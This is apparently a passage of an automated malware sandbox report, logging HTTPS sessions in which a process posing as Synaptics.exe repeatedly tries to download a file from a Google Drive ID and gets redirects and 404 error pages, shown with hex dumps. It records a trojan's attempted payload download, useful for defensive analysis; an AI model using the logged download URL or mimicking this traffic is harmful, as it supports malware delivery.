                                                                                              Cookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA
                                                                                              2025-01-02 19:28:59 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:58 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-a6gJ5BYJ2LHc7E_VcqnfYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              41192.168.2.749871216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:58 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA
                                                                                              2025-01-02 19:28:59 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:59 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-lJmAZQ7ahkRH2WF1FCTtfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              42192.168.2.749883216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:59 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA
                                                                                              2025-01-02 19:29:00 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:59 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-V4YVBomaft2KxVkySt9CmQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              43192.168.2.749884142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:59 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:00 UTC1250INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC5LNAhF-WZImqMJE2h1aw20IWxl_pX39ks43SM4QMA9u87e5Y0E_DDdTo4AJXc11ZrXV-rG2cA
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:00 GMT
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-PBBHbP74qaPcYsk6Eh8Qmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:00 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                              2025-01-02 19:29:00 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 49 44 49 63 68 54 6b 4a 55 30 6a 4b 44 53 48 4f 79 55 58 42 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="QIDIchTkJU0jKDSHOyUXBQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                              2025-01-02 19:29:00 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              44192.168.2.749885142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:59 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:00 UTC1250INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC4txd3J3z7NtVkRjz7-fdvZhtTrvPNZpwc888c0pD7f-rHnNwa06iU0VLgI3IuaecbAveIQ_oU
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:00 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-qc1fQdVIWz8oLKA3Wduvpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:00 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                              2025-01-02 19:29:00 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 42 69 58 59 58 4f 75 37 42 4f 4b 2d 4b 4e 38 52 65 62 66 43 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="KBiXYXOu7BOK-KN8RebfCw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                              2025-01-02 19:29:00 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              45192.168.2.749886216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:59 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA
                                                                                              2025-01-02 19:29:00 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:00 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-0rRqOVwV_JO6Itdi8u8Y4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              46192.168.2.749892216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:00 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA
                                                                                              2025-01-02 19:29:01 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:01 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-sPWcaFxQft1mm_EJfRB4lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              47192.168.2.749893142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:00 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:01 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC4WbCL8cV0zRYT9GLuetqJpzU15IIX3-R84NvHXezU5Ozx9G-RNWmkZQgqip8xprEa6
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:01 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce--acklA5EADnoaowUL6Ox5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:01 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                              2025-01-02 19:29:01 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 74 4d 58 6c 59 4d 45 6f 78 4a 34 41 37 6d 6b 58 52 4a 39 68 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="itMXlYMEoxJ4A7mkXRJ9hg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:29:01 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
